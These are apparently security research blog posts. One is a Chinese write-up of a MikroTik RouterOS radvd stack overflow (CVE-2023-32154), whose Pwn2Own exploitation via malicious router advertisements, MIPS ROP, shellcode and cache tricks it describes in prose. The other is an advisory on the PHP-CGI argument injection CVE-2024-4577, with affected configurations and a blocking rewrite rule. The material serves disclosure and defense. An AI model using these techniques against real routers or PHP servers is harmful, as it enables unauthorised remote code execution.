Nova message 的開頭是兩個 magic bytes:M2。接下來,每個 key 都使用 4 bytes 來描述;其中,前 3 bytes 用來表達 key 的 id,最後一個 byte 是 key 的型別。根據型別,會以不同解析方式將緊接在後的 bytes 取出作為 data,取完 data 之後,後面緊接著的便是下一個 key,如此循環下去。當中比較特別的是 bool 型別,因為 bool 可以僅用一個 bit 表示,nova message 便直接使用 type 的最低一位 bit 來表示 True/False,更詳細的格式可以參考 Ian Dupont, Harrison Green. Pulling MikroTik into the Limelight

x3 format

為了瞭解 nova message 中 SYS_TOSYS_FROM的 id 具體是指哪一個 nova binary,我們需要解析一種副檔名為 x3 的檔案,它是 binary 格式的 xml。在撰寫工具解析 /nova/etc/loader/system.x3後,我們便可得知每個 id 所對應的是哪個 nova binary,例如在下圖中,/nova/bin/log的 id 就是 3。

但有些 binary 的 id 並不在這個檔案當中,是因為該 binary 可能是透過安裝 MikroTik 官方提供的 package 之後才有的功能,此時 binary 的 id 就會存在於 /ram/pckg/<package_name>/nova/etc/loader/<package_name>.x3當中,radvd就是一例。

儘管如此,依舊有些 binary id 是無法在任何 .x3 檔案中找到的,因為這類型的 process 並不是持久存在,例如:只有使用者嘗試登入時才會被喚起的 login process,這類 process 就以流水號作為 id。

另外,.x3 檔案也被用來記錄 nova binary 的相關設定,例如 www就在 .x3 中指定每個 URI 應該使用哪一個 servlet 來進行處理。

小結

經由回顧了過去的研究及 CVE,可以發現大多我們感興趣的漏洞都集中在過去的一段時間內,近期似乎很難在 RouterOS 的 WAN 端找到 pre-auth 的漏洞。 且雖然這期間持續有漏洞被揭露,但可以發現 MikroTik 變得越來越安全。MikroTik 上真的已經不存在 pre-auth 的漏洞了嗎?或許單純只是所有人都把什麼東西漏看了?

前面提及的公開研究,可以簡單分成下面三類:

  • 越獄(Jailbreaking)
  • 分析在野的 exploit
  • 研究 IPC 中的 nova message

然而在逆向 RouterOS 上的 binary 一段時間之後,我們發現整個系統的複雜度不僅於此,但卻沒什麼人提及相關細節。因此有了以下的感想:「沒有任何理智正常的人想要花時間逆向 nova binary」。

除了從 CIA 及 APT 取得的 exploit 之外,大部分在 RouterOS 上尋找漏洞的研究不外乎是 Fuzzing 網路協議、玩弄 nova message 或是針對 nova message 進行模糊測試。從成果來看,攻擊者對於 RouterOS 的理解似乎高過我們很多,我們需要探索更多關於 nova binary 的細節來彌補差距,才有機會找到我們想要找的漏洞。雖然我們並不反對 fuzzing 這個手法,但若要在這場比賽中取得優勢,我們就必須確定所有細節都被親眼看過。

從何開始

我們不認為 RouterOS 已經完美無暇,而且不難發現研究員與攻擊者對於 RouterOS 的理解存在著差距。所以,要在 RouterOS 上找到 pre-auth RCE 我們還缺少什麼?

首先我們想到的第一個問題是:IPC 的入口點在哪裡,它又通往哪裡?大部分透過 IPC 觸發的功能都需要進行登入,所以可以預期到:拘泥於 IPC,只會找到更多 post-auth 的弱點。且 IPC 不過只是 RouterOS 上用來實作主要功能的其中一個環節,我們更想直接、謹慎的觀察每個功能的核心程式碼。

舉例來說:負責處理 DHCP 的 process 是如何從一個 DHCP 封包中擷取需要的資訊?這些資訊可能直接被存在該 process 中,或可能需要透過 IPC 送給其他 process 做進一步處理。

Nova Binary 的架構

因此我們必須先認識 nova binary 的架構,每個 nova binary 中都有一個 Looper(或其衍生類別:MultifiberLooper),Looper 是負責執行 event loop 邏輯的一個類別,每次迭代都會呼叫 runTimer來執行時間到了的 timer ,以及呼叫 poll去檢查 socket 的狀態並做相對應的處理。

Looper 也負責自己所在的 nova binary 與 loader 之間的溝通,Looper 首先會先會針對當前 binary 與 loader 之間的 unix socket 註冊一個特別的 callback function:onMsgSock,這個函式負責把從 socket 收到的 nova message 分配給 nova binary 中對應的 handler。

Handler 類別與其衍生類

當 Looper 收到一個 nova message 時,它會將之分派給對應的 handler。例如,SYS_TO[14, 0]的訊息會被 loader 分配給 binary id 為 14 的 nova binary,而 binary id 為 14 的 binary 中的 looper 收到時,SYS_TO已經剩下 [0],因此 looper 會將其分配給 handler 0 進行處理。如果一開始的 nova message 中 SYS_TO[14],則 looper 收到時 SYS_TO[],這種情境將由 Looper 自行處理。

現在讓我們假設,Looper 收到了一個由 handler 1 負責的 nova message,並分配給 handler 1,在收到 message 後,handler 1 會去呼叫 Handler 類別中的 nv::Handler::handleCmd,這個函式會根據 nova message 中的 SYS_CMD在 vtable 中尋找對應的 function 執行。

除了常規的功能之外,vtable 中的 cmdUnknown常被開發者 override 用以擴充功能,但有時開發者反而是 override handleCmd,看起來是全依 MikroTik 開發者的心情而定。而 Handler 類別因為是基礎類別,所以 object 相關的指令並沒有被實作。

衍生類別

然而 nova binary 中使用最多的並不是基本的 Handler 類別,而是其衍生類別。 衍生類別可以用來儲存多個單一型別物件,類似 C++ 的 STL 容器。

舉例來說,當使用者透過 web panel 的管理介面建立一個 DHCP server 的時候,會送出一個指令為「add object」的 nova message 到 dhcp process 的 handler 0,接下來 handler 0 會產生一個 dhcp server 物件記錄相關設定,並且該物件會被保存在 handler 0 內部的一個 tree 當中。

這裡的 handler 0 就是一個 AMap的 instance,AMap即是 Handler的一個衍生類別。 且由於指令是「add object」,所以觸發了 AMap::cmdAddObj這個成員函式,這個成員函式會去呼叫 handler 0 的 vtable 中位於 offset 0x7c 位置所指向的一個 function,這個 function 實際上就是 AMap中包含的物件的建構式,例如,若開發者在宣告 handler 0 時,其類型為 AMap<string>,則 offset 0x7c 的位置所指向的 function 就是 string的建構式。

每個衍生類別儲存內部物件建構式的 function 在 vtable 上的 offset 都不相同,想要找到衍生類別中物件的建構子,可以透過逆向它們個別的 cmdAddObj來找到。

IPC,和 IPC 以外的

儘管 IPC 似乎無處不在,但其實 RouterOS 中有許多功能並不以 IPC 實現。以實作在 discover程式中的兩個 layer 2 的發現協議:CDP、LLDP 為例:

  1. 在開啟這兩個服務時,discover中的 handler 0 會負責去呼叫 nv::createPacketReceiver來開啟 CDP 及 LLDP 使用的 socket 並且註冊分別對應的 callback function
  2. 在 Looper 的每次迭代中,程式會透過 poll 來檢查 CDP 及 LLDP socket 是否有收到封包
  3. 如果發現有收到封包就會呼叫對應的 callback function 去進行處理

CDP 的 callback 做的事情也非常簡單:確定收到封包的 interface 是允許存取的,如果正確,就解析封包並直接把資訊直接存入 nv::ASecMap接著就直接結束,過程中並不使用 nova message。

在此類情境中,IPC 除了用來開啟 CDP 或 LLDP 服務之外(預設開啟),完全無法觸發 CDP 或是 LLDP 的任何功能,因此以往專注於 IPC 的研究就很有可能沒有檢測到這種實作方式的程式邏輯。

Pre-Auth RCE 的故事

對於 RouterOS 的理解,也伴隨著一次驚喜的意外帶領我們找到深藏已久的漏洞。

賽前某一天,我們照常為了在 RouterOS 上進行逆向及除錯而插拔網路線時,發現 log file 紀錄到 radvd這隻程式已經 crash 了好幾次!所以我們嘗試插拔網路線來手動復現 crash 的發生,搭配 debugger 使用就能定位到出問題的地方,但經過了上千次的插拔,我們還是無法確定 crash 產生的條件,只能任憑 crash 隨機的發生。

經過一段時間的掙扎後,我們停止透過這種盲目的嘗試來定位漏洞,轉而利用靜態逆向分析 radvd來尋找 crash 產生的位置,雖然最後依舊沒找到造成 crash 的根因,但受益於我們對於 nova binary 的理解,我們在 radvd中找到了另外一個可以利用的漏洞。

在介紹這個漏洞之前,必須得先介紹一下 radvd process 究竟是負責什麼功能的程式。

SLAAC (Stateless Address Auto-Configuration )

一言以蔽之,radvd是一個負責處理 IPv6 的 SLAAC 的服務。

在 SLAAC 環境中,假設一台電腦想要取得一個 IPv6 的地址上網,他首先會向所有 router 廣播一個 RS(Router Solicitation)的請求。 在 Router 收到 RS 之後,就會透過 RA(Router Advertisement)將 network prefix 廣播出去;收到 RA 的電腦便可以拿 network prefix 以及 EUI-64 來自行決定自己用來連網的 IPv6 為何。

若 ISP 或是網管,想把一個網段分配給用戶,讓用戶可自行分配地址給用戶管理的機器,在只使用 SLAAC 而不輔以 DHCP 時,如何分配一個網段給使用者?因為 SLAAC 並沒有辦法直接委派,所以通常會是這麼運作的:

假設有一個 upstream router:Router A,它屬於 ISP 或網管、還有一台用戶自行管理的 Router B、一台用戶管理的電腦。ISP 或網管會預先透過 email 通知用戶一個分配給用戶使用的 /48 network preifx,這裡假設是 2001:db8::/48。用戶可以將之設定在 Router B 上,則當電腦向 Router B 發送 RS 時,Router B 就會把這個 prefix 放入 RA 中回傳,而這個 prefix 稱作 routed prefix。

同時為了讓使用者的 Router B 有辦法與 Router A 溝通,它也需要一個自己的 IPv6 地址,這時 Router B 從 Router A 拿到的 network prefix 就稱作 link prefix。

radvd 的執行流程

  1. radvd process 被啟動時,會透過 nv::ThinRunner::addSocket來開啟 radvd使用的 socket 並且註冊對應的 callback function
  2. Looper的每次迭代中會透過 poll 檢查 socket 是否有收到封包

  3. 如果發現有收到封包就會呼叫對應的 callback function 去進行處理

radvd的 callback 中,它首先檢查封包是否是合法的 RA 或 RS,是 RA 就把資訊存起來;是 RS 就開始往 LAN 廣播 RA。

而總共有三種情況 RouterOS 會往 LAN 廣播 prefix:

  1. 從 LAN 收到 RS 封包
  2. 從 WAN 收到 RA 封包
  3. 定時在 LAN 廣播 RA 封包(預設隨機在 200~600 秒之後廣播一次)

不過在 callback 中我們沒有馬上透過靜態分析找到 case 2 發送 RA 的地方,當時我們還不確定具體原因。後來發現這部分的行為與 RouterOS IPC 中的訂閱機制有關,我們將會在後面的章節進行解釋,這同時也與我們發現的 race condition 相關。不過另外兩個情況我們到是可以直接透過靜態分析找到。

在 case 1 中,當從 LAN 收到 RS 時,radvd會呼叫 sendRA 來廣播 RA 封包:

在 case 2 中,handler 1 在初始化後便會去註冊一個 timer,RAroutine

RAroutine被用來在每隔一段時間去呼叫 sendRA 來廣播封包:

CVE-2023-32154

可以發現共同的函式就是 sendRA,在深入分析 sendRA之後,我們發現 radvd在處理 DNS advisory 的地方存在弱點。

首先,radvd會將 upstream 收到的 RA 中的 DNS advisory 儲存起來(使用 tree 作為資料結構),當 router 要往 LAN 廣播 RA 時,這些 DNS 也會被包進 RA 中一起被廣播給 LAN 的機器。在 radvd中,是 addDNS這個 function 將樹狀結構的 DNS 展開後放進 ICMPv6 的封包當中。用來傳遞給 addDNS的第一個參數 RA_raw是一個 4096 bytes 的 buffer,也就是最終被送出的 ICMPv6。

跟進 addDNS後我們馬上可以發現這裡可能存在一個 stack buffer overflow 的弱點,addDNS透過 memcpy把 DNS 放進 ICMPv6 封包中而且沒有任何 boundary check,只要 DNS advisory 給的夠多就可以觸發 stack buffer overflow。

這裡使用的 DNS 來自於 RA 封包中的 RDNSS 欄位,但根據 RFC 可以發現,用來描述 RDNSS 長度的欄位只有 8-bit,所以最多僅能覆蓋 255*16 bytes,這個長度並無法使我們覆寫到 return address。

但如果這不是 radvd第一次收到 RA,radvd就需要在接下來的封包中將舊的 DNS 標為 expired,所以實際上我們可以覆蓋兩倍的長度,也就是 255*16*2 bytes,這就足以讓我們覆蓋到 return address 了。

攻擊流程

有了上述的弱點,我們只要透過往目標 RouterOS 送兩個 RDNSS 欄位長度為 255 的惡意 RA 封包,就可以利用 RDNSS 中的 IPv6 地址來控制 radvd程式的執行流程。

保護

由於 RouterOS 使用 MIPS 的架構,所以 CPU 並不支援 NX ,但除此之外的保護也沒有被開啟。 所以只要找到好用的 ROP gadget 讓執行流程最終 jump 到我們放在 stack 上的 shellcode 就行了,聽起來極度簡單。

shellcode 限制

但是在構造 exploit 的過程中其實存在不少限制,例如,因為 IPv6 地址被儲存在 tree 結構中,所以會在排序後才放上 stack,因此我們必須保證我們建構的 payload 在經過排序之後還會是我們一開始構造的 shellcode。

最簡單的方法是把 IPv6 的 prefix 當作流水號,這樣可以保證我們構造的內容照順序排列,接者只要透過 ROP gadget 跳到後半段的 shellcode 上面就算完成了。而在撰寫 shellcode 時,我們只要把每個地址的 suffix 都構造成 jump,用來跳過無法執行的流水號即可。

但由於 MIPS 存在 delay slot 機制的關係,CPU 實際上會先去執行 jump指令的後一條指令。

所以我們必須把 jump往前移動才行,但緊接著的問題便是:在 delay slot 中不能使用 syscall這個指令。這種情境下,payload 構造起來相當麻煩之外,還可能會超過我們可以使用的長度,因此這從一開始就是個壞主意。

然而眼尖的朋友肯定已經發現了,這其實是 CTF 中常見的初學等級題目,只要讓 prefix 是一個合法且不影響執行結果的指令就好了,我們把 prefix 改成 addi s8, s0, 1, addi s8, s0, 2, addi s8, s0, 3……,以此類推。除了 payload 會照排序排好之外,也節省了本來用來放 jump指令的空間。

但我們還需要稍微修改一下 payload 才行,因為我們沒有 leak stack 位址的漏洞,加上我們找不到任何可用的 gadget 來把 stack 位址從 $sp暫存器搬到 $t9暫存器,所以我們這裡做的事情是:首先,透過 ROP gadget 把 jalr $sp指令寫到一塊記憶體上,之後再用一個 ROP gadget 跳上去執行它,這樣就可以將執行流程導向我們構造的 shellcode,聽起來是一片光明的未來:

但光是這樣是無法順利執行 shellcode 的,因為 MIPS 針對記憶體的存取方式有兩個不同的 cache。

cache

MIPS 上存在兩個 cache:I-cache(instruction cache)、D-cache(data cache)。

當我們把 jslr $sp指令寫上記憶體時,實際上是寫到 D-cache 中。

而當我們接著把執行流程控制到 jslr $sp的地址時,處理器會先去檢查這個地址的指令有沒有在 I-cache 當中,因為該位址位於 data section,在正常執行流程中肯定沒有被執行過,所以 cache 永遠都會 miss,因此處理器會接著將 memory 的內容載入 I-cache 當中。

此時因為 D-cache 的內容還沒有被更新到 memory 上,I-cache 只會抓到一堆 null bytes,也就是 MIPS 上的 nop,所以程式只會執行一堆毫無意義的 nop 直到 crash 為止。

在這裡我們需要使處理器將 D-cache 的內容寫回 memory,有兩個方法可以做到這件事情:context switch 或是用盡 D-cache 所有空間(32 KB)。觸發 context switch 是比較簡單的做法,但在 radvd中並沒有任何 sleep讓我們用來觸發 context switch,其他 function 雖然也會陷進 kernel,但 context switch 發生的機率並不高,為了角逐 Pwn2Own 冠軍,讓攻擊達到趨近 100% 成功的穩定度是必須的,因此我們轉而尋找耗盡 D-cache 的 32kb 容量的方法。

首先,透過簡單的檢查可以發現 RouterOS 的 radomize_va_space變數是 1,表示 heap 的記憶體位址不是隨機的,因此不需要 leak 就可以知道 heap 所在位址,所以我們只要接著想辦法讓 heap 分配足夠大的空間,然後寫一些無關緊要的東西上去就可以耗盡 32kb 的 D-cache 了!不過 radvd中並沒有太多好用的 ROP gadget,所以要構造這樣的 payload 需要串連更多 ROP gadget 才能達到同樣的目的,最終 payload 長度可能會超過我們可以覆蓋的長度。

幸運的是如同前面所說,DNS 被存放在 tree 結構中,所以儲存時就已經在 heap 中佔據一大塊記憶體,透過 gdb 逐步執行,我們可以確定在處理 DNS 時,heap 的空間已經比 32kb 還要大!因此我們只要接著透過 GOT hijack 呼叫 memcpy 往 heap 寫 32kb 的垃圾就可以了!

最後我們的 exploit 就完成了:

結合我們另外一個為了 Pwn2Own 找的 Canon printer 弱點,攻擊流程會是

  1. 攻擊者作為 router 的壞鄰居,對它發送惡意的 ICMPv6 封包
  2. 在成功控制 router 後,我們進行 port forwarding,把 payload 導向在 LAN 的 Canon 印表機。

在 Pwn2Own 的比賽環境中,網路環境可以被簡化得更簡單一點,如下:

Exploit 除錯過程

就在我們覺得 $100,000 的獎金已經到手的時候,不可思議的事情發生了,那就是我們的攻擊只要在 Ubuntu 上執行就會失敗,不管這個 Ubuntu 系統是在 MacOS 內的一台虛擬機器又或者是一台 Ubuntu 實機;而 Pwn2Own 官方,基本上是使用 Ubuntu 來執行我們的 exploit,所以我們必須要解決這個問題。

我們嘗試在 MacOS 上執行 exploit 並且紀錄網路封包,然後在 Ubuntu 上重放流量,可以觀察到重放會失敗:

我們也嘗試在 Ubuntu 上執行 exploit 並且記錄網路封包,當然在 Ubuntu 上是失敗的,但當我們在 MacOS 重放失敗的流量時,他竟然成功了:

到這裡我們猜測可能是其中一個 OS 在送出封包之前會對封包進行重新排序,而重新排序的這個行為或許在 wireshark 擷取到封包之後,所以才沒被 wireshark 紀錄到。因此我們直接寫了一個 sniffer 放在 router 上面來監控流量,且因為 AF_PACKET類型的 socket 不會被防火牆規則影響,結果應該要非常可靠:

然而,從兩邊錄到的封包根本一模一樣……

所以,exploit 目前只在我的 MacOS 上成功過,如果狀況不解決,唯一的方法就是我帶著我的 Mac 筆電飛去多倫多,在現場用我自己的筆電進行攻擊。但我們不可能放著這個成因不明的問題不管,誰知道會不會在比賽中也發生在我的筆電上,如果真的發生那就虧大了。

在經過幾次謹慎的復盤之後我們終於知道問題的成因了——速度。因為兩個 RA 封包送出時間間隔並不大,所以很難在 wireshark 的時間軸上直接看出來,但如果計算一下會發現,兩個所花費的時間其實相差了 390 倍。所以問題也不是出在 Ubuntu 上,而是因為 Mac 送兩個封包送的太快,不小心觸發了存在在 radvd 中的 race condition(加上極度懶惰的我沒有好好計算蓋到 return address 要花多少 bytes,直接在上面寫滿垃圾然後做 pattern match 而已,所以這個 offset 只在 race 的情況下才正確)。

解決方法就是在送出兩個 RA 封包之間 sleep 一下,並把 payload 中的 offset 修復成沒有 race 的情況下觀察到的 offset,就可以穩定我們的攻擊腳本,把成功機率提升到 100%。

Fix

這個漏洞在以下版本中已經被修復:

  • Long-term Release 6.48.7
  • Stable Release 6.49.8, 7.10
  • Testing Release 7.10rc6

同時我們也發現這個漏洞從 RouterOS v6.0 就已經存在了,從官網可以發現 6.0 的發布日期是 2013-05-20,也就是說這個漏洞已經存在在那裡九年之久,卻沒有人發現他。

呼應到我們一開始的想法:「沒有任何理智正常的人想要花時間逆向 nova binary」,得證。

The race condition

然而這個妨礙我們輕鬆賺取 $100,000 的 race condition 是怎麼發生的?如前面所述,nova binary 中有一個 Looper 循環檢查當前有什麼事件發生,也就是説這是一個 single thread 的程式,那 race condition 是怎麼回事?(有些 nova binary 是 multi-fiber,但 radvd並不是)

這就要提到一個剛才沒有提到的細節,當 radvd在解析從 WAN 收到的 RA 封包時,DNS 是被存入一個 「vector」 當中,然而在準備 LAN 廣播用的 RA 封包時,addDNS卻是把一個儲存了 DNS 的 「tree」給展開,所以這個 vector 跟 tree 之間是什麼關係?又是怎麼轉換過去的?

這也是為什麼我們沒有第一時間就在 callback 裡面找到「從 WAN 收到 RA 就會往 LAN 廣播 RA 封包」的邏輯,因為這是由兩個 process 在一陣複雜的互動之後所產生的結果。

我們仔細看一下 callback 具體上做了什麼,可以看到有一個 array 負責用來存放一種叫做「 remote object」的物件,這段程式碼看起來很直觀,就是迭代存有 DNS 的 vector,然後為每個 DNS 地址都呼叫一次 nv::roDNS,並把函式的執行結果保存在 DNS_remoteObject vector 當中。

remote object

所以什麼是 remote object?remote object 是 RouterOS 中用來跨 process 分享資源的一個機制:一個 process 負責保存共用資源,然後另外一個 prcoess 可以通過 id 向負責保存的 process 發送請求來進行增刪查改。 例如 DNS remote object 實際上放在 resolver process 中的 handler 2,而 radvd的 handler 1 只是單純保有這些物件對應的 id 而已。

subscription and notification

當一個 remote object 被更新時,有些 process 可能會想要做出對應的行為,所以 nova binary 可以透過 IPC 事先訂閱其他 nova binary 中的 remote object。以 dhcpippool6為例,ippool6中的 handler 1 負責管理 ipv6 address pool,dchp process 會去訂閱 ippool6的 handler 1,所以當 ipv6 address pool 有異動時,dhcp 可以檢查需不需要針對這些異動進行進一步的處理,例如關閉某個 dhcp server。

訂閱的這個行為是透過發送一個指令為 subscribe 的 nova message 給想要訂閱的 binary,當中的 SYS_NOTIFYCMD包含了具體想要被通知的狀況是什麼。

所以在上述情況中,當有另外一個 process 往 ippool6中增加 object 時,handler 1 的 cmdAddObj函式會被執行。

在大部分情況裡,AddObj固定會去呼叫 sendNotifies來通知那些有訂閱 0xfe000b 事件的 subscribers,告訴他們訂閱的物件已被改動,所以 ippool6這裡會送一個 nova message 給 dhcp process,告知物件被改動後的結果。

在理解了訂閱機制之後,我們可以更全面的理解 radvdresolver之間的互動如下:

radvd從 WAN 收到 RA 封包後,它會對每個 IPv6 地址呼叫 roDNS來請 resolver建立相關的 remote object。而 resolver中的 handler 4 會負責處理這個請求,並在 handler 2 中建立對應的 ipv6 object,接著因為 radvd的 handler 1 訂閱了 resovler的 handler 2,所以 resolver的 handler 2 把目前擁有的所有 DNS address 推播給 radvd的 handler 1,接著 handler 1 就依照他收到的 DNS address 構造 RA 封包,之後在 LAN 廣播該封包。

Race Condition 成因

Race condition 的問題實際上出在 roDNS的實作,roDNS中使用 postMessage來發送 nova message,而這個方法是 non-blocking 的,表示 radvd中的 remote object 並不會馬上知道它在 resolver中對應的 id 是什麼。

因此若第二個封包太快到達,以至於 radvd還無從得知 remote object 的 id 是什麼的時候,radvd就沒有辦法第一時間確實的刪除這些物件,只能先將它們標記成 destroyed 進行軟刪除,這就造成了 race condition 的產生。

我們一步一步的分解整個流程:

首先,因為兩個 process 都是 single thread,我們可以假設 radvdresolver兩個 process 現在正在執行他們的第一個 loop。

radvd從 WAN 收到一個只有一個 DNS address 的 RA 時,radvd會向 resolver發送一個創建 remote object 的請求。

resolver在收到第一個請求的同時會設定一個 timer,因爲在 IPC 的機制中,resolver無法知道多少個 AddObj請求屬於同一批,所以它非常簡單的設了一個一次性的 timer,時間到了才送出一次 notification。除此之外,每次 resolver處理完單個創建的請求後應該要回傳一個 nova message 作為 response,通知 radvd剛剛被新增的 remote object 的 id 是多少,而 radvd會透過方才送出請求時一併註冊的一次性 ResponseHandler 來處理這個回應。

但如果第二個 RA 封包太快被送到,以至於 resolver都還沒有把 id 透過 response 送回來時,radvd只能先把舊的 DNS remote object 標記成 destroyed 進行軟刪除。

接著 radvd繼續為收到的第二個 RA 封包中的 RDNSS 欄位建立新的 DNS remote object,但由於 resolver還沒有結束第一個迭代,所以這個新的請求會停留在 socket 裡面等待下一個迭代才處理。

接下來回到 resolver,第一個迭代以回傳 id 給 radvd做收尾,radvd的 ResponseHandler 會根據拿到的 id 去更新 remote object,但由於對應的 remote object 已經被標記成刪除,所以 ResponseHandler 不會去更新 object id,而是直接刪除該 object。

ResponseHandler 在刪除完 radvd中保存的 remote object 之後,會發送一個 delete object 的 message 給 resolver,告知它對應的 remote object 已經不再使用所以要進行刪除,但一樣會先卡在 socket 裡面等待處理

接著 resolver進入了第二次迭代,它會先拿到 socket 中為了第二個 RA 創建 remote object 的請求,為第二個 RA 的 DNS 創建對應的 remote object:

但在接著處理 delete 請求之前,先前設定的 timer 時間到了,所以resolver會呼叫 nv::Handler::sendChanges來通知所有的訂閱者現在 resolver 知道的 DNS 有哪些,因為 object 1 還沒有被刪除,因此 resolver 會把兩次的請求創建的 DNS 通通都推播出去。

radvd 在收到這樣的資訊之後就會馬上構造用來在 LAN 廣播的 RA 封包,此時兩次的請求結果被混在一起了,這也就是為什麼一開始我們的攻擊只會在 MacOS 上成功的原因。雖然這個 race condition 聽起來很難觸發(刪除請求比 timer 先進行處理的話就不會觸發),但這是因為方便解釋,所以整個流程被我們大幅簡化了,實際上只要兩個封包到達的時間間隔夠短這個 race 就一定會成功。

小結

透過上面的分析,我們在 RouterOS 的 remote object 機制中找到了一個 race condition 的 pattern:

  • 在新增/刪除 remote object 時,使用了 non-blocking 的方法
  • 有訂閱 remote object

透過這類型的漏洞,攻擊者可以將兩次請求的結果混合成一個回傳,或許可以作為一個用來繞過某些安全性檢查的手法。如果順利找到可利用的漏洞,我們還可以用來參加 Pwn2Own 當中的 router 類別中的 LAN 項目。

然而最後時間緊迫,我們並沒有透過 race condition 找到可以利用的漏洞。而且禍不單行,在報名準備截止時,我們才發現這幾個月來被我們測試了上百次的 exploit 存在一些問題,就在報名截止的三個小時前像鬼打牆一樣,怎麼打怎麼失敗,簡直就是數位世代的逢魔時刻,我們一直更新 exploit 並且不斷更新準備上交的漏洞白皮書,一直到報名前止的半小時前(凌晨四點截止)才順利完成。

但是非常幸運的,我們在賽中僅嘗試一次就順利的完成了攻擊,成為 Pwn2Own 歷史上第一組完成 SOHO SMASHUP 這個新類別的隊伍:

我們在這個項目中獲得了 10 點 Master of Pwn 點數還有 $100,000 美金的獎金,最終在比賽結算時,DEVCORE 以 18.5 個 Master of Pwn 點數奪下冠軍。

冠軍除了獲得 Master of Pwn 的頭銜、獎杯、外套之外,照慣例,主辦方還會各寄一台我們打下的設備過來。

(我們沒辦法把所有東西都塞進相框裡)

結論

在本次研究中,我們對 RouterOS 進行了深入探討,進而揭露了一個潛藏在 RouterOS 內長達九年的安全漏洞,並成功利用該漏洞在 Pwn2Own Toronto 2022 的賽事中奪下 SOHO SMASHUP 的項目。此外,我們還在 IPC 中發現了一種導致 race condition 的行為模式。最後,我們也將賽事中使用的工具開源於 https://github.com/terrynini/routeros-tools ,供大家參考。

通過本次研究及分享,DEVCORE 希望分享我們的發現和經驗,從而協助白帽駭客深入了解 RouterOS,使之變得更加透明易懂。

Security Alert: CVE-2024-4577 - PHP CGI Argument Injection Vulnerability

$
0
0

English Version, 中文版本

During DEVCORE’s continuous offensive research, our team discovered a remote code execution vulnerability in PHP. Due to the widespread use of the programming language in the web ecosystem and the ease of exploitability, DEVCORE classified its severity as critical, and promptly reported it to the PHP official team. The official team released a patch on 2024/06/06. Please refer to the timeline for disclosure details.

Description

While implementing PHP, the team did not notice the Best-Fit feature of encoding conversion within the Windows operating system. This oversight allows unauthenticated attackers to bypass the previous protection of CVE-2012-1823 by specific character sequences. Arbitrary code can be executed on remote PHP servers through the argument injection attack.

Impact

This vulnerability affects all versions of PHP installed on the Windows operating system. Please refer to the table below for details:

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

Since the branch of PHP 8.0, PHP 7, and PHP 5 are End-of-Life, and are no longer maintained anymore, server admins can refer to the Am I Vulnerable section to find temporary patch recommendations in the Mitigation Measure section.

Am I Vulnerable?

For the usual case of combinations like Apache HTTP Server and PHP, server administrators can use the two methods listed in this article to determine whether their servers are vulnerable or not. It’s notable to address that Scenario-2 is also the default configuration for XAMPP for Windows, so all versions of XAMPP installations on Windows are vulnerable by default.

As of this writing, it has been verified that when the Windows is running in the following locales, an unauthorized attacker can directly execute arbitrary code on the remote server:

  • Traditional Chinese (Code Page 950)
  • Simplified Chinese (Code Page 936)
  • Japanese (Code Page 932)

For Windows running in other locales such as English, Korean, and Western European, due to the wide range of PHP usage scenarios, it is currently not possible to completely enumerate and eliminate all potential exploitation scenarios. Therefore, it is recommended that users conduct a comprehensive asset assessment, verify their usage scenarios, and update PHP to the latest version to ensure security.

Scenario 1: Running PHP under CGI mode

When configuring the Action directive to map corresponding HTTP requests to a PHP-CGI executable binary in Apache HTTP Server, this vulnerability can be exploited directly. Common configurations affected include, but are not limited to:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

Or

<FilesMatch"\.php$">
SetHandler application/x-httpd-php-cgi
</FilesMatch>
Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

Scenario 2: Exposing the PHP binary (also the default XAMPP configuration)

Even if PHP is not configured under the CGI mode, merely exposing the PHP executable binary in the CGI directory is affected by this vulnerability, too. Common scenarios include, but are not limited to:

  1. Copying php.exe or php-cgi.exe to the /cgi-bin/ directory.
  2. Exposing the PHP directory via ScriptAlias directive, such as:
    ScriptAlias /php-cgi/ "C:/xampp/php/"

Mitigation Measure

It is strongly recommended that all users upgrade to the latest PHP versions of 8.3.8, 8.2.20, and 8.1.29. For systems that cannot be upgraded, the following instructions can be used to temporarily mitigate the vulnerability.

However, since PHP CGI is an outdated and problematic architecture, it’s still recommended to evaluate the possibility of migrating to a more secure architecture such as Mod-PHP, FastCGI, or PHP-FPM.

1. For users who cannot upgrade PHP:

The following Rewrite Rules can be used to block attacks. Please note that these rules are only a temporary mitigation for Traditional Chinese, Simplified Chinese, and Japanese locales. It is still recommended to update to a patched version or migrate the architecture in practice.

RewriteEngineOnRewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]

2. For users who use XAMPP for Windows:

XAMPP has not yet released corresponding update files for this vulnerability at the time of writing this article. If you confirm that you do not need the PHP CGI feature, you can avoid exposure to the vulnerability by modifying the following Apache HTTP Server configuration:

C:/xampp/apache/conf/extra/httpd-xampp.conf

Locating the corresponding lines:

ScriptAlias /php-cgi/ "C:/xampp/php/"

And comment it out:

# ScriptAlias /php-cgi/ "C:/xampp/php/"

Timeline

  • 2024/05/07 - DEVCORE reported this issue through the official PHP vulnerability disclosure page.
  • 2024/05/07 - PHP developers confirmed the vulnerability and emphasized the need for a prompt fix.
  • 2024/05/16 - PHP developers released the first version of the fix and asked for feedback.
  • 2024/05/18 - PHP developers released the second version of the fix and asked for feedback.
  • 2024/05/20 - PHP entered the preparation phase for the new version release.
  • 2024/06/06 - PHP released new versions 8.3.8, 8.2.20, and 8.1.29.

Reference

資安通報:PHP 遠端程式碼執行 (CVE-2024-4577) - PHP CGI 參數注入弱點

$
0
0

English Version, 中文版本

戴夫寇爾研究團隊在進行前瞻攻擊研究期間,發現 PHP 程式語言存在遠端程式碼執行弱點,基於 PHP 在網站生態使用的廣泛性以及此弱點之易重現性,研究團隊將此弱點標記為嚴重、並在第一時間回報給 PHP 官方。官方已在 2024/06/06 發佈修復版本,詳細時程可參閱漏洞回報時間軸

漏洞描述

PHP 程式語言在設計時忽略 Windows 作業系統內部對字元編碼轉換的 Best-Fit特性,導致未認證的攻擊者可透過特定的字元序列繞過舊有 CVE-2012-1823的保護;透過參數注入等攻擊在遠端 PHP 伺服器上執行任意程式碼。

影響範圍

此弱點影響安裝於 Windows 作業系統上所有的 PHP 版本,詳情可參照下表:

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

由於 PHP 8.0 分支、PHP 7 以及 PHP 5 官方已不再維護,網站管理員可參考如何確認自己易遭受攻擊章節,並於修補建議找到暫時緩解措施。

